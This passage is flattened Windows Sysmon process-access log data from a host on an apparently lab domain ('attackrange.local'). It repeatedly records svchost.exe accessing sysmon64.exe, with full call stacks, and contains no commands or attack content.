\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.728{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001740Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001739Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001738Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001737Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001736Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001735Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001734Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.725{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.724{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.724{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.723{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.723{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.723{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.723{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.723{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.723{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.723{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 